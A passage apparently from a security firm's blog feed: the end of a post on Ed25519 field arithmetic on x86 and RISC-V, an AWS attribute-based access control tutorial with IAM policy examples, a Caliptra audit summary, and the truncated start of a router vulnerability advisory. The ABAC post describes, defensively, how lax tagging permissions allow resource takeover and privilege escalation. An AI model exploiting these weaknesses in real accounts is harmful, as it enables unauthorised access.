The “m64” backend could be deemed to be the most classical, in that such a representation would be what was preferred for big integer computations in, say, the 1990s. It minimizes the number of multiplication opcode invocations during a field element multiplication (with two 4-limb operands, 16 register multiplications are used), but also implies quite a lot of carry propagation. See for instance this excerpt of the implementation of field element multiplication in crrl’s m64 backend:

let (e0, e1) = umull(a0, b0);
let (e2, e3) = umull(a1, b1);
let (e4, e5) = umull(a2, b2);
let (e6, e7) = umull(a3, b3);

let (lo, hi) = umull(a0, b1);
let (e1, cc) = addcarry_u64(e1, lo, 0);
let (e2, cc) = addcarry_u64(e2, hi, cc);
let (lo, hi) = umull(a0, b3);
let (e3, cc) = addcarry_u64(e3, lo, cc);
let (e4, cc) = addcarry_u64(e4, hi, cc);
let (lo, hi) = umull(a2, b3);
let (e5, cc) = addcarry_u64(e5, lo, cc);
let (e6, cc) = addcarry_u64(e6, hi, cc);
let (e7, _) = addcarry_u64(e7, 0, cc);

let (lo, hi) = umull(a1, b0);
let (e1, cc) = addcarry_u64(e1, lo, 0);
let (e2, cc) = addcarry_u64(e2, hi, cc);
let (lo, hi) = umull(a3, b0);
let (e3, cc) = addcarry_u64(e3, lo, cc);
let (e4, cc) = addcarry_u64(e4, hi, cc);
let (lo, hi) = umull(a3, b2);
let (e5, cc) = addcarry_u64(e5, lo, cc);
let (e6, cc) = addcarry_u64(e6, hi, cc);
let (e7, _) = addcarry_u64(e7, 0, cc);

The addcarry_u64() calls above implement the “add with carry” operation, which, on x86, map to the ADC opcode (or, on that core, the ADCX or ADOX opcodes).

When Ed25519 signatures were invented, in 2011, the Intel CPUs du jour (Intel “Westmere” core) were not very good at carry propagation; they certainly supported the ADC opcode, but with a relatively high latency (2 cycles), and that made the classical code somewhat slow. The use of 51-bit limbs allowed a different code, which, in curve25519-dalek’s serial backend, looks like this:

let b1_19 = b[1] * 19;
let b2_19 = b[2] * 19;
let b3_19 = b[3] * 19;
let b4_19 = b[4] * 19;

// Multiply to get 128-bit coefficients of output
let c0: u128 = m(a[0], b[0]) + m(a[4], b1_19) + m(a[3], b2_19) + m(a[2], b3_19) + m(a[1], b4_19);
let mut c1: u128 = m(a[1], b[0]) + m(a[0], b[1]) + m(a[4], b2_19) + m(a[3], b3_19) + m(a[2], b4_19);
let mut c2: u128 = m(a[2], b[0]) + m(a[1], b[1]) + m(a[0], b[2]) + m(a[4], b3_19) + m(a[3], b4_19);
let mut c3: u128 = m(a[3], b[0]) + m(a[2], b[1]) + m(a[1], b[2]) + m(a[0], b[3]) + m(a[4], b4_19);
let mut c4: u128 = m(a[4], b[0]) + m(a[3], b[1]) + m(a[2], b[2]) + m(a[1], b[3]) + m(a[0] , b[4]);

This code excerpt computes the result over five limbs which can now range over close to 128 bits, and some extra high part propagation (not shown above) is needed to shrink limbs down to 51 bits or so. As we see here, there are now 25 individual multiplications (the m() function), since there are five limbs per input. There still are ADC opcodes in there! They are somewhat hidden behind the additions: these additions are over Rust’s u128 type, a 128-bit integer type that internally uses two registers, so that each addition implies one ADC opcode. However, these carry propagations can occur mostly in parallel (there are five independent dependency chains here), and that maps well to the abilities of a Westmere core. On such cores, the “serial” backend is faster than crrl’s m64. However, in later x86 CPUs from Intel (starting with the Haswell core), support for add-with-carry opcodes was substantially improved, and the classical method with 64-bit limbs again gained the upper hand. This was already noticed by Nath and Sarkar in 2018 and this explains why crrl’s m64 backend, on our x86 test system, is faster than curve25519-dalek’s serial and fiat backends, and even a bit faster than the AVX2-powered simd backend.

RISC-V

Now enters the RISC-V platform. RISC-V is an open architecture which has been designed with what can be viewed as “pure RISC philosophy”, with a much reduced instruction set. It is inspired by the older DEC Alpha, including in particular a large number of integer registers (32), one of which is fixed to the value zero, and, most notably, no carry flag at all. An “add-with-carry” operation, which adds together two 64-bit inputs x and y and an input carry c, and outputs a 64-bit result z and an output carry d, now requires no fewer than five instructions:

  1. Add x and y, into z (ADD).
  2. Compare z to x (SLTU): if z is strictly lower, then the addition “wrapped around”; the comparison output (0 or 1) is written into d.
  3. Add c to z (ADD).
  4. Compare z to c (SLTU) for another potential “wrap around”, with a 0 or 1 value written into another register t.
  5. Add t to d (ADD).

(I cannot prove that it is not doable in fewer RISC-V instructions; if there is a better solution please tell me.)
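A minimal plain-Rust sketch of this five-instruction sequence may make it concrete; the adc_u64 helper below is illustrative and not taken from either library:

```rust
// Carry-flag-free add-with-carry, mirroring the five RISC-V instructions
// listed above. Returns (sum, carry_out); both carries are 0 or 1.
fn adc_u64(x: u64, y: u64, c: u64) -> (u64, u64) {
    let z = x.wrapping_add(y); // 1. ADD
    let d = (z < x) as u64;    // 2. SLTU: did the first addition wrap?
    let z = z.wrapping_add(c); // 3. ADD
    let t = (z < c) as u64;    // 4. SLTU: did adding the carry wrap?
    (z, d + t)                 // 5. ADD: combine the two carry bits
}

fn main() {
    assert_eq!(adc_u64(u64::MAX, 1, 0), (0, 1));
    assert_eq!(adc_u64(u64::MAX, u64::MAX, 1), (u64::MAX, 1));
    assert_eq!(adc_u64(3, 4, 1), (8, 0));
    println!("ok");
}
```

Note that the two SLTU results can simply be added: the full sum x + y + c never exceeds 2^65 - 1, so at most one of the two wrap-arounds can occur and the combined carry is at most 1.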

Thus, the add-with-carry is not only a high-latency sequence, but it also requires quite a few instructions, and instruction throughput may be a bottleneck. Our test platform (SiFive U74 core) is not well documented, but some cursory tests show the following:

  • Multiplication opcodes have a throughput of one per cycle, and a latency of three cycles (this seems constant-time). As per the RISC-V specification (“M” extension), a 64×64 multiplication with a 128-bit result requires two separate opcodes (MUL returns the low 64 bits of the result, MULHU returns the high 64 bits). There is a recommended code sequence for when the two opcodes relate to the same operands, but this does not appear to be leveraged by this particular CPU.
  • For “simple” operations such as ADD or SLTU, the CPU may schedule up to two instructions in the same cycle, but the exact conditions for this to happen are unclear, and each instruction still has a 1-cycle latency.

Under such conditions, a 5-instruction add-with-carry will need a minimum of 2.5 cycles (in terms of throughput). The main output (z) is available with a latency of 2 cycles, but the output carry has a latency of 4 cycles. A “partial” add-with-carry with no input carry is cheaper (an ADD and a SLTU), and so is an add-with-carry with no output carry (two ADDs), but these are still relatively expensive. The high latency is similar to the Westmere situation, but the throughput cost is new. For that RISC-V platform, we need to avoid not only long dependency chains of carry propagation, but we should also endeavour to do fewer carry propagations. Another operation which is similarly expensive is the split of a 115-bit value (held in a 128-bit variable) into low (51-bit) and high (64-bit) parts. The straightforward Rust code looks like this (from curve25519-dalek):

let carry: u64 = (c4 >> 51) as u64;
out[4] = (c4 as u64) & LOW_51_BIT_MASK;

On x86, the 128-bit value is held in two registers; the low part is a simple bitwise AND with a constant, and the high part is extracted with a single SHLD opcode, that can extract a chunk out of the concatenation of two input registers. On RISC-V, there is no shift opcode with two input registers (not counting the shift count); instead, the extraction of the high part (called carry in the code excerpt above) requires three instructions: two single-register shifts (SHR, SHL) and one bitwise OR to combine the results.

In order to yield better performance on RISC-V, the crrl m51 backend does things a bit differently:

let a0 = a0 << 6;
let b0 = b0 << 7;
// ...
let (c00, h00) = umull(a0, b0);
let d0 = c00 >> 13;

Here, the input limbs are pre-shifted (by 6 or 7 bits) so that the products are shifted by 13 bits. In that case, the boundary between the low and high parts falls exactly on the boundary between the two registers that receive the multiplication result; the extraction of the high part becomes free! The low part is obtained with a single opcode (a right shift of the low register by 13 bits). Moreover, instead of performing 128-bit additions, crrl’s m51 code adds the low and high parts separately:

let d0 = c00 >> 13;
let d1 = (c01 >> 13) + (c10 >> 13);
let d2 = (c02 >> 13) + (c11 >> 13) + (c20 >> 13);
// ...
let h0 = h00;
let h1 = h01 + h10;
let h2 = h02 + h11 + h20;

In that way, all add-with-carry operations are avoided. This makes crrl’s m51 code somewhat slower than curve25519-dalek’s serial backend on x86, but it improves performance quite a bit on RISC-V.
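The alignment can be checked with a short standalone sketch; the umull helper is re-implemented here for the example, with the same (lo, hi) return convention as the m64 excerpt earlier:

```rust
// Demonstrates the pre-shift trick: with a shifted left by 6 and b by 7,
// the product is (a*b) << 13, so the split of a*b at bit 51 falls exactly
// on the 64-bit register boundary.
fn umull(x: u64, y: u64) -> (u64, u64) {
    let z = (x as u128) * (y as u128);
    (z as u64, (z >> 64) as u64)
}

fn main() {
    let a: u64 = (1 << 51) - 1; // largest 51-bit limb
    let b: u64 = 0x1234_5678_9ABC;
    let (lo, hi) = umull(a << 6, b << 7);
    let low51 = lo >> 13; // low 51 bits of a*b: a single shift
    let high = hi;        // (a*b) >> 51: free, it is just the high word
    // Check against the direct 128-bit computation.
    let p = (a as u128) * (b as u128);
    assert_eq!(low51, (p as u64) & ((1u64 << 51) - 1));
    assert_eq!(high, (p >> 51) as u64);
    println!("ok");
}
```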

Conclusion

The discussion above is about a fairly technical point. In the grand scheme of things, the differences in performance between the various implementation strategies is not great; there are not many usage contexts where a speed difference of less than 30% in computing or verifying Ed25519 signatures has any relevance to overall application performance. But, insofar as such things matter, the following points are to be remembered:

  • Modern large CPUs (for laptops and servers) are good at handling add-with-carry, and for them the classical “64-bit limbs” format tends to be the fastest.
  • Some smaller CPUs will be happier with 51-bit limbs. However, there is no one-size-fits-all implementation strategy: for some CPUs, the main issue is the latency of add-with-carry, while for some others, in particular RISC-V systems, the instruction throughput is the bottleneck.

Introduction to AWS Attribute-Based Access Control

2 October 2023 at 12:01

AWS allows tags, arbitrary key-value pairs, to be assigned to many resources. Tags can be used to categorize resources however you like. Some examples:

  • In an account holding multiple applications, a tag called “application” might be used to denote which application is associated with each resource.
  • A tag called “stage” might be used to separate resources belonging to alpha, beta, and production stages within a single account.
  • A tag called “cost-center” might be used to indicate which business unit is responsible for a resource. AWS’ billing can break down bills by tag, allowing customers to allocate costs from a shared account to the appropriate budgets.

Once you have tagged your resources, you can search and filter based on tags. That’s not very interesting from a security perspective. Far more interesting is using tags to implement attribute-based access control (ABAC).

Attribute-Based Access Control

The “normal” AWS authorization scheme is known as Role-Based Access Control (RBAC): you define “roles” corresponding to service or job functions (implemented as IAM Users or Roles) and assign them the privileges necessary for those functions. A disadvantage of this scheme is that when you add new resources to your environment, the privileges assigned to your principals may need to be modified. This doesn’t scale particularly well with large numbers of resources. Using resource-based permission policies rather than identity-based permission policies can help with this, but that doesn’t scale well with large numbers of principals (especially since AWS doesn’t allow permissions to be granted to groups using resource-based permission policies). Also, not all resources support resource-based permission policies.

An alternative authorization scheme is to assign tags to principals and resources then grant permissions based on the combinations of principal and resource tags. For instance, all principals tagged as belonging to project QuarkEagle can be allowed to access resources also tagged as belonging to project QuarkEagle, while principals tagged with project CrunchyNugget can only access resources also tagged CrunchyNugget. This approach isn’t suitable for all scenarios but can result in significantly fewer and smaller permission policies that rarely need to be updated even as new principals and resources are added to accounts. This scheme is known as “attribute-based access control” (ABAC) or “tag-based access control” (TBAC), depending on the source.

In practice, you’re not likely to want a “pure” ABAC environment: most ABAC deployments will combine it with elements of RBAC.

How AWS implements ABAC

Apart from tags themselves, there are no new fundamental concepts in AWS for ABAC. You still have principals and resources with identity-based and resource-based permission policies. However, instead of having a lot of specifics in the resource and principal fields, an ABAC permission policy will have wildcards in those fields with the real logic implemented using conditions. There are four main condition keys that relate to tagging:

  • aws:ResourceTag/<tag-name>: control access based on the values of tags attached to the resource being accessed.
  • aws:RequestTag/<tag-name>: control the tag values that can be assigned to or removed from resources.
  • aws:TagKeys: control access based on the tag keys specified in a request. This is a multi-valued condition key.
  • aws:PrincipalTag/<tag-name>: control access based on the values of tags attached to the principal making the API request.

Some examples are in order to clarify how these condition keys are used.

If a principal is only permitted to publish messages to SNS Topics belonging to project QuarkEagle, then it might have this permission policy statement:

{
    "Effect": "Allow",
    "Action": "sns:Publish",
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringEquals": {
            "aws:ResourceTag/project": "QuarkEagle"
        }
    }
}

This allows your principal to publish to any SNS Topic, so long as that Topic has a tag named “project” whose value is “QuarkEagle”. If you want to go a step further, you could tag your principals with their associated projects and then use this permission policy statement instead:

{
    "Effect": "Allow",
    "Action": "sns:Publish",
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringEquals": {
            "aws:ResourceTag/project": "${aws:PrincipalTag/project}"
        }
    }
}

Now any principal that has a tag named “project” with the value “QuarkEagle” can publish to any SNS topic whose “project” tag is also “QuarkEagle” and any principal whose “project” tag is “CrunchyNugget” can publish to any topic that is also tagged “CrunchyNugget” — no need for permission policies that know about every tag value in use.

If your principals can create and delete SNS Topics, then you should make sure that they can only create properly tagged ones and can only delete ones with the proper tags. Similarly, if you allow your principals to set or unset tags, then you probably don’t want to allow them to change the “project” tag values on their resources. To enforce that, you might give them permission policy statements like this:

{
    "Effect": "Allow",
    "Action": [
        "sns:CreateTopic",
        "sns:TagResource"
    ],
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringEquals": {
            "aws:RequestTag/project": "${aws:PrincipalTag/project}",
            "aws:ResourceTag/project": "${aws:PrincipalTag/project}"
        }
    }
},
{
    "Effect": "Allow",
    "Action": "sns:DeleteTopic",
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringEquals": {
            "aws:ResourceTag/project": "${aws:PrincipalTag/project}"
        }
    }
},
{
    "Effect": "Allow",
    "Action": [
        "sns:TagResource",
        "sns:UntagResource"
    ],
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringEquals": {
            "aws:ResourceTag/project": "${aws:PrincipalTag/project}"
        },
        "ForAllValues:StringNotEquals": {
            "aws:TagKeys": "project"
        }
    }
}
  1. The first statement permits the principal to create SNS Topics so long as each new Topic’s “project” tag has the same value as the principal’s “project” tag. Setting a tag during resource creation requires the same sns:TagResource permission as setting one explicitly later, so we grant permission for both actions. During resource creation, the condition key aws:ResourceTag is set to the value specified for the tag to be created, so the two condition checks are very similar but both are necessary to prevent the principal from using sns:TagResource in unintended ways:
    • Without the check against aws:RequestTag, the principal would be able to assign arbitrary tag values to existing Topics that currently share the principal’s “project” tag (potentially giving away those Topics to someone else; this could allow one principal to elevate the privileges of another, useful in a scenario where someone has compromised two different principals, neither of which can do what the attacker wants).
    • Omitting the aws:ResourceTag check would allow the principal to re-tag arbitrary existing Topics to its “project” tag value (allowing it to take control of other Topics and likely elevating its privileges if the principal has other permissions allowing it to read from or write to Topics that share its “project” tag).
  2. The second statement permits the principal to delete SNS Topics whose “project” tag have the same value as the caller’s “project” tag.
  3. The third statement enables the principal to change the tags on existing SNS Topics. The first condition, using aws:ResourceTag, requires that the target Topic’s “project” tag have the same value as the caller’s “project” tag. The second condition, using aws:TagKeys, prevents the caller from changing the value of the Topic’s “project” tag. Note that due to the first statement, it’s still possible for the principal to set a Topic’s “project” tag, but only if the value is the caller’s “project” tag.

ABAC permissions policies are easy to get wrong. Even Amazon has difficulty with them: AWS’ public documentation contains a number of example permission policies similar to the first statement above that do not contain the “StringEquals”: { “aws:ResourceTag/project”: “${aws:PrincipalTag/project}” } condition. Make sure that any ABAC permission policies that you write or review cover all scenarios.

It’s also important that your principals can’t change the “project” tags on themselves. If you need to allow your principals to call iam:TagUser and iam:UntagUser (or their equivalents for Roles), then you should use similar permission policies to prevent them from removing or changing the values of their “project” tags.
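One way to enforce this is an explicit Deny statement that blocks any user-tagging request touching the “project” key. The following is a sketch in the same style as the statements above, not a policy taken from AWS documentation:

```json
{
    "Effect": "Deny",
    "Action": [
        "iam:TagUser",
        "iam:UntagUser"
    ],
    "Resource": "*",
    "Condition": {
        "ForAnyValue:StringEquals": {
            "aws:TagKeys": "project"
        }
    }
}
```

Because aws:TagKeys is multi-valued, the ForAnyValue set operator makes the Deny apply whenever “project” appears anywhere in the request’s list of tag keys, regardless of what other keys accompany it.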

If you want to enforce some order on what tags are applied, then you can use a permission policy statement such as the following to prevent principals from setting any tags other than “department”, “project”, and “stage” on SNS Topics:

{
    "Effect": "Deny",
    "Action": "sns:TagResource",
    "Resource":"arn:aws:sns:*:*:*",
    "Condition": {
        "ForAnyValue:StringNotEquals": {
            "aws:TagKeys": [
                "stage",
                "project",
                "department"
            ]
        }
    }
}

A similar permission policy statement employing aws:RequestTag/… can be used to control the values that may be assigned to tags.
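For example, a statement along these lines (a sketch with hypothetical tag values; note the IfExists variant, which avoids denying requests that do not mention the “stage” key at all) restricts the “stage” tag on SNS Topics to three approved values:

```json
{
    "Effect": "Deny",
    "Action": "sns:TagResource",
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringNotEqualsIfExists": {
            "aws:RequestTag/stage": [
                "alpha",
                "beta",
                "prod"
            ]
        }
    }
}
```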

Some services offer a condition key that can be used to make a permission policy statement apply only during resource creation (such as EC2’s ec2:CreateAction); using such a condition in your Policies can make them simpler and easier to understand. For instance, the following permission statement allows a principal to create tagged EC2 resources without allowing any weird ec2:CreateTags abuses:

{
    "Effect": "Allow",
    "Action": [
        "ec2:CreateSecurityGroup",
        "ec2:CreateImage",
        "ec2:CreateVolume",
        "ec2:RunInstances"
    ],
    "Resource":"*",
    "Condition": {
        "StringEquals": {
            "aws:RequestTag/project": "${aws:PrincipalTag/project}"
        }
    }
},
{
    "Effect": "Allow",
    "Action": "ec2:CreateTags",
    "Resource": "arn:aws:ec2:*:*:*",
    "Condition": {
        "StringEquals": {
            "ec2:CreateAction": [
                "CreateSecurityGroup",
                "CreateImage",
                "CreateVolume",
                "RunInstances"
            ]
        }
    }
}

The first statement permits the caller to create a few different EC2 resources so long as they have the same “project” tag value as the caller. Actually setting that tag, even during resource creation, requires a permission for ec2:CreateTags, so the second statement allows the caller to create tags only from those resource-creation API actions. However, this approach has its own flaws: EC2 considers ec2:CreateTags to be a resource-creation action, so make sure that any wildcards that you use in the ec2:CreateAction condition check don’t match ec2:CreateTags.

With proper use of tagging, combined with separate VPCs, it may be possible to put separate applications and separate stages of each application in the same account without allowing, for instance, beta principals to access prod data. Not that I’d recommend this approach: getting the tagging right is a lot of work (and there are many gotchas; see below). If you’re building a new application, it’s usually safer (and easier) to just use separate accounts for each application and stage with cross-account access via Role assumption and VPC peering as needed. But it’s worth considering for big complicated accounts with access control problems: it may be less work to implement ABAC on top of existing applications than it is to disentangle a giant messy account.

Manipulating tags

AWS services that support tagging have API actions to add and remove tags from resources and to list the tags on a resource. Tagging support was added to many AWS services well after they were first released and ABAC support was grafted on later still. As a result, the implementation of tagging isn’t consistent between services.

The most common patterns for API action names are:

  • TagResource / UntagResource / ListTagsForResource: a single set of API actions for all taggable resources in the service. One of the arguments is a resource ARN; if the service supports more than one type of resource, it figures out the resource type and what to do from there based on the ARN. One or more tags can be set or removed at once. This seems to be the most common pattern, used by Lambda, SNS, DynamoDB, and other services. However, there is a lot of variation in the name of the tag-listing operation: sns:ListTagsForResource, lambda:ListTags, dynamodb:ListTagsOfResource, apigateway:GetTags, kms:ListResourceTags, etc. Some services don’t have a tag-listing operation at all, allowing tags to be retrieved only using other resource-description API actions (e.g., Secrets Manager). There are also several variations on this pattern:
    • AddTagsToResource / RemoveTagsFromResource / ListTagsForResource: these API actions tend to work just like in the above case only with different names. This pattern is used by RDS and SSM.
    • AddTags / RemoveTags / ListTags, used by CloudTrail.
    • CreateTags / DeleteTags / DescribeTags, used by EC2 and Workspaces. In EC2’s case, ec2:DescribeTags doesn’t operate on a single resource but rather returns information about every resource in EC2 (with optional filters to limit the response to certain specific resources, resource types, etc.).
  • Tag<Resource> / Untag<Resource> / List<Resource>Tags: separate sets of API actions for each taggable resource. You need to call the correct API action for the type of resource that you want to tag and provide a resource name or ARN. As above, you can generally set or remove one or more tags at once. This pattern is followed by IAM and SQS (some specific examples: iam:TagUser, sqs:UntagQueue, iam:ListRoleTags). Certificate Manager uses a variation on this pattern: acm:AddTagsToCertificate / acm:RemoveTagsFromCertificate / acm:ListTagsForCertificate.

Most resource-creation API actions allow tags to be assigned during resource creation. Assigning a tag this way requires the permission for the tag-setting API action in addition to the resource-creation API action. For instance, to create an SNS Topic, I need permission for the action “sns:CreateTopic“. If I set a tag on a Topic while creating it, then I also need permission for the action “sns:TagResource” even if I never directly call that API action. However, there may still be some resources that support tagging but cannot be tagged at creation or cannot be tagged when created using CloudFormation.

The syntax for setting tags using the AWS CLI also differs between services. Most services' resource-creation and tagging API actions use a "--tags" command-line argument followed by a list of tags to set, but how that list is formatted depends on the service. Some services (including SQS and Lambda) expect "--tags project=QuarkEagle,stage=beta" while others (such as SNS and SSM) expect an argument of the form "--tags Key=project,Value=QuarkEagle Key=stage,Value=beta". EC2 is an exception; during resource creation, it uses a more elaborate form of the latter syntax: "--tag-specifications 'ResourceType=security-group,Tags=[{Key=project,Value=QuarkEagle},{Key=stage,Value=beta}]'".
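The same split exists in the SDKs: some services take a flat map of tags while others take a list of Key/Value pairs. A small helper can convert between the shapes (a sketch; the helper name is mine, and the commented boto3 calls are illustrative):

```python
# The same logical tags must be reshaped per service: a plain dict is the
# flat map form that SQS and Lambda accept, while SNS, EC2, SSM, and others
# want a list of {"Key": ..., "Value": ...} pairs.

def to_key_value_list(tags: dict) -> list:
    """dict -> [{'Key': k, 'Value': v}, ...] (SNS/EC2/SSM style),
    sorted by key for deterministic output."""
    return [{"Key": k, "Value": v} for k, v in sorted(tags.items())]

tags = {"project": "QuarkEagle", "stage": "beta"}
print(to_key_value_list(tags))

# With boto3 these would be passed as, e.g.:
#   sns.tag_resource(ResourceArn=topic_arn, Tags=to_key_value_list(tags))
#   sqs.tag_queue(QueueUrl=queue_url, Tags=tags)
```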

If you were thinking that it would be really nice for AWS to provide a unified tagging API, you're not alone. AWS Resource Groups has a tagging API that can operate on most AWS services that support tagging. Besides providing a generic interface to tagging and untagging, this service also provides ways to retrieve all tag keys and values currently in use by an account and to query resources by tag across multiple services. From the AWS CLI, you can use "aws resourcegroupstaggingapi tag-resources ..." to apply tags to arbitrary resources. To do this, you need both a "tag:TagResources" permission and a tagging permission for the resource that you are trying to tag. Untagging is similar. The following is a minimal permission policy to allow a principal to apply tags to a specific SNS Topic (resource constraints aren't supported on the tag:TagResources permission because the resources are not in the Resource Groups service):

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "sns:TagResource",
            "Resource": "arn:aws:sns:us-east-1:111111111111:some-topic"
        },
        {
            "Effect": "Allow",
            "Action": "tag:TagResource",
            "Resource": "*"
        }
    ]
}

Special Cases

S3 is the special snowflake; there's a reason why I didn't use it for my examples above. While most AWS services have API actions that add or remove individual tags, the S3 tagging API operates on the entire set of tags on the object at once: s3:PutObjectTagging and s3:PutBucketTagging replace the full set of tags on the target resource with the given set, while s3:DeleteObjectTagging and s3:DeleteBucketTagging remove all tags from the target resource. If an object has the tags "application", "stage", and "owner" and you want to change the value of "owner", then your call to s3:PutObjectTagging needs to set the "owner" tag to its new value and the "application" and "stage" tags to their current values in order to not lose the other tags. Tags can be retrieved using s3:GetObjectTagging and s3:GetBucketTagging. Unfortunately, the Resource Groups Tagging API does not support objects in S3 so it does not provide a work-around for S3's weird tagging implementation.
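Because s3:PutObjectTagging replaces the whole tag set, changing a single tag safely requires a read-modify-write cycle. A minimal sketch (the helper name is mine; the commented boto3 calls use placeholder bucket and object names and would require credentials):

```python
# s3:PutObjectTagging replaces the entire tag set, so changing one tag
# safely means: read the current tags, merge the change, then write the
# full set back.

def merge_tagset(tagset: list, key: str, value: str) -> list:
    """Return a new S3-style TagSet with `key` set to `value`,
    preserving all other existing tags."""
    merged = [t for t in tagset if t["Key"] != key]
    merged.append({"Key": key, "Value": value})
    return merged

# Hedged boto3 usage (placeholder names, requires AWS credentials):
#   import boto3
#   s3 = boto3.client("s3")
#   current = s3.get_object_tagging(Bucket="my-bucket", Key="my-object")["TagSet"]
#   s3.put_object_tagging(
#       Bucket="my-bucket", Key="my-object",
#       Tagging={"TagSet": merge_tagset(current, "owner", "new-owner")},
#   )
```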

To make the S3 case even more complicated, both Buckets and objects can be tagged but S3 only supports ABAC on objects. Even that support is incomplete: ABAC is not supported for s3:PutObject, s3:DeleteObject, or s3:DeleteObjectVersion calls. S3 also doesn’t support the normal aws:ResourceTag, aws:RequestTag, and aws:TagKeys condition keys at all: you must use S3-specific condition keys:

  • s3:ExistingObjectTag/<tag-name>: control access based on the values of tags attached to objects.
  • s3:RequestObjectTag/<tag-name>: control the tag values that can be assigned to or removed from objects.
  • s3:RequestObjectTagKeys: control access based on the tag keys specified in a request. This is a multi-valued condition key.

There may be other services with unusual tagging implementations; I haven’t checked all of them. EC2 has its own tagging condition key “ec2:ResourceTag” but that seems to be a synonym for aws:ResourceTag.

Limitations of AWS ABAC

Unfortunately, ABAC support across AWS is incomplete (though improving) and has many implementation inconsistencies across services. Quirks of AWS’ ABAC implementation include:

  • Some services do support tagging but don’t support ABAC; others support ABAC on only some types of resources or in some contexts. There may yet be some services that don’t support tagging at all. The following table, describing ABAC support for a number of frequently-encountered AWS services, is summarized from Amazon’s documentation:
    Service              ABAC support?
    -------------------  -------------
    EC2                  Yes
    S3                   Partial support for objects using non-standard condition keys; no support for Buckets
    Lambda               For Functions but not for other resource types
    DynamoDB             No
    RDS                  Yes
    IAM                  Users and Roles only, with exceptions
    Certificate Manager  Yes
    Secrets Manager      Yes
    KMS                  Yes
    CloudTrail           Yes
    CloudWatch           Mostly
    CloudFormation       Yes
    API Gateway          Yes (though not for API authorization)
    CloudFront           Yes
    Route 53             No
    SNS                  Yes
    SQS                  Yes (added in fall 2022)

    Details on some of those limitations:

    • IAM: it is not possible to limit who can pass a Role using tags on that Role. While it is tempting to try to limit overly-permissive iam:PassRole permissions by allowing principals to pass only Roles with specific tags, that won’t work.
    • S3: it is not possible to limit who can delete or overwrite an S3 object based on tags on that object, nor is it possible to control access to API actions that operate on Buckets using tags. S3 also doesn’t support the normal condition keys for tags, instead using its own.
    • CloudWatch Logs doesn’t support limitations on the tags that can be assigned to Log Groups and doesn’t support aws:ResourceTag/<tag-name> for logs:DescribeLogGroups.
  • As previously noted, the tagging APIs and available condition keys for tagging are not consistent, either in name or function, across all AWS services. As a result, make sure to thoroughly review or test ABAC policies, especially if they contain Deny rules based on tagging. It won’t do to attempt to restrict access to S3 objects using aws:ResourceTag/<tag-name> because that condition key won’t exist: you need to use s3:ExistingObjectTag/<tag-name>. It also won’t do to treat s3:PutObjectTagging like you do iam:TagUser in your permission policies because they work differently.
  • Also as noted above, AWS’ pattern of requiring a tagging permission to assign tags while creating a resource makes it altogether too easy to accidentally give principals excessive tagging permissions. Carefully review all permission policies that permit tagging during resource creation.
  • In most cases, tag names are case-sensitive: “Project” is a different tag than “project“. However, this is not entirely consistent across services. Tags on IAM Users and Roles (though not on other IAM resources) are case-insensitive.
  • Some services (such as Secrets Manager) won’t let a principal change a tag if that change would prevent that principal from accessing the resource after the change. Other services (such as SNS) do not have this restriction.
  • There are some random bugs and missing functionality in various services.  SQS doesn’t support aws:ResourceTag in resource-based permission policies. EC2 doesn’t support aws:ResourceTag checks during resource creation; you must use the EC2-specific condition key ec2:CreateAction to protect your tag-on-create permissions for EC2. CloudTrail seems to support aws:ResourceTag only after Trail creation and doesn’t seem to support aws:RequestTag or aws:TagKeys at all. There are probably a few other similar bugs out there.

Hopefully AWS’ ABAC support will continue to improve over time.

More information

Public Report – Caliptra Security Assessment

18 October 2023 at 18:26

During August and September of 2023, Microsoft engaged NCC Group to conduct a security assessment of Caliptra v0.9.

Caliptra is an open-source silicon IP block for datacenter-focused server-class ASICs. It serves as the internal root-of-trust for both measurement and identity of a system-on-chip. The main use cases for Caliptra are to assure integrity of mutable code, to authorize firmware updates, and to support secure platform configuration and lifecycle state transitions. Notably, Caliptra also implements the TCG DICE Protection Environment, enabling other entities within the SoC to leverage the unique device identity for their own security operations.

Our evaluation of Caliptra spanned the three primary components:

  • ROM: The immutable mask ROM, which executes when Caliptra is brought out of reset.
  • First Mutable Code: Started by the ROM, the FMC is responsible for loading the runtime.
  • Runtime Firmware: The services that Caliptra provides to the rest of the SoC.

Microsoft furnished NCC Group with several testing objectives and focus areas for this project. These requirements were related to upholding the properties of confidentiality, integrity, and availability for the DICE Protection Environment and its security-critical assets:

  • Ensure that the firmware loading and authentication processes cannot be bypassed.
  • Review DPE signing operations for side-channel information leakage, impacting the Unique Device Secret or Composite Device Identifier.
  • Prevent attacks that undermine DICE initialization and external firmware measurement.
  • Ensure that measurements cannot be silently dropped or excluded from DPE derivations.
  • Determine whether an attacker can malform the DPE context tree structure.
  • Determine whether risks are present due to leaving cryptographic material in memory.
  • Under debug, DPE certificates should not chain to vendor-signed DeviceID certificates.
  • Assess the effectiveness of Caliptra’s exploit mitigation technologies.
  • Assess the soundness of the fault injection countermeasures.

The assessment identified 26 vulnerabilities, which were promptly addressed by the Caliptra team prior to the publication of this report. Read the full report here:

The audit was performed under the umbrella of the Open Compute Project’s (OCP) Security Appraisal Framework Enablement (SAFE) program, which was recently announced at the OCP Global Summit. More details about SAFE can be found in GitHub, here, including the short-form report for Caliptra’s ROM, FMC and Runtime firmware.

Since May of this year, NCC Group has been collaborating with the OCP by sharing our expertise in hardware and firmware security to support the creation of the SAFE program and the definition of its testing methodologies and reporting outputs. NCC Group is an approved SAFE Security Review Provider.

Technical Advisory – Multiple Vulnerabilities in Connectize G6 AC2100 Dual Band Gigabit WiFi Router (CVE-2023-24046, CVE-2023-24047, CVE-2023-24048, CVE-2023-24049, CVE-2023-24050, CVE-2023-24051, CVE-2023-24052)

19 October 2023 at 13:53

Connectize’s G6 WiFi router was found to have multiple vulnerabilities exposing its owners to potential intrusion in their local Wi-Fi network and browser. The Connectize G6 router is a general consumer Wi-Fi router with an integrated web admin interface for configuration, and is available for purchase by the general public. These vulnerabilities were discovered in firmware version 641.139.1.1256, and are believed to be present in all versions up to and including that version.

A total of seven vulnerabilities were uncovered, with links to the associated technical advisories, as well as detailed descriptions of each finding, below.

  1. Command Injection via Ping Diagnostic Functionality (CVE-2023-24046)
